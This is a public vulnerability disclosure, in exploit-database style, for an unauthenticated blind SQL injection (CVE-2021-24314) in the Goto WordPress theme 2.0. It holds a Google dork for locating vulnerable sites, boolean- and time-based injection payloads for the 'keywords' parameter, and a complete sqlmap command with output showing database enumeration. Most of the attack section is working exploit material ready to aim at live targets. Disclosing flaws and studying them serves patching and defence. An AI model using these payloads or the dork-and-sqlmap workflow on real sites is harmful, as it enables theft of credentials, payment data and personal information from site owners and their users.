/*!
- # VULNERABILITY: Goto WordPress Theme 2.0 - Unauthenticated Blind SQL Injection
- # GOOGLE DORK: inurl:/wp-content/themes/goto/
- # DATE: 2021-03-24
- # SECURITY RESEARCHER: m0ze [ https://m0ze.ru ]
- # VENDOR: BoostifyThemes [ https://boostifythemes.com ]
- # SOFTWARE VERSION: 2.0
- # SOFTWARE LINK: https://themeforest.net/item/goto-tour-travel-wordpress-theme/21822828
- # CVSS: AV:N/AC:L/PR:N/UI:N/S:C
- # CWE: CWE-89
- # CVE: CVE-2021-24314
*/
### -- [ Info: ]
[i] An Unauthenticated Blind SQL Injection vulnerability was discovered in the Goto theme v2.0 for WordPress.
[i] Vulnerable parameter(s): ?keywords=.
[i] Blind SQL Injection type(s): boolean-based, time-based.
### -- [ Impact: ]
[~] Unauthorized access to sensitive data from the database (passwords, credit card details, personal user information), database data modification (Insert/Update/Delete), administration operations execution on the database (such as shutdown the DBMS), in some cases issue commands to the OS or performing a DoS attack.
### -- [ Payloads: ]
[$] 13%' AND 7478=7478 AND 'QcwX%'='QcwX&start_date=13
[$] 13%' AND (SELECT 1362 FROM (SELECT(SLEEP(8)))kpeo) AND 'ThDS%'='ThDS&start_date=13
### -- [ PoC | Unauthenticated Blind SQL Injection | Search query (database names): ]
[!] sqlmap --url="https://example.com/tour-list/?keywords=13&start_date=13" --random-agent -dbs --level=3 --threads=4 --dbms=MySQL -p keywords
___
__H__
___ ___[,]_____ ___ ___ {1.5.3.16#dev}
|_ -| . [(] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 02:20:47 /2021-03-24/
[02:20:47] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: keywords (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: keywords=13%' AND 7478=7478 AND 'QcwX%'='QcwX&start_date=13
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: keywords=13%' AND (SELECT 1362 FROM (SELECT(SLEEP(5)))kpeo) AND 'ThDS%'='ThDS&start_date=13
---
[02:20:58] [INFO] testing MySQL
[02:21:00] [WARNING] reflective value(s) found and filtering out
[02:21:00] [INFO] confirming MySQL
[02:21:08] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.31, PHP 7.3.7, PHP
back-end DBMS: MySQL >= 5.0.0
[02:21:08] [INFO] fetching database names
[02:21:08] [INFO] fetching number of databases
[02:21:28] [INFO] retrieved: 18
[02:23:02] [INFO] retrieved: information_schema
[02:23:48] [INFO] retrieved: 4
[02:24:20] [INFO] retrieved: goto
available databases [2]:
[*] information_schema
[*] goto
[*] ending @ 02:32:25 /2021-03-24/
### -- [ Contacts: ]
[+] Website: m0ze.ru
[+] GitHub: @m0ze
[+] Telegram: @m0ze_ru
[+] Twitter: @vladm0ze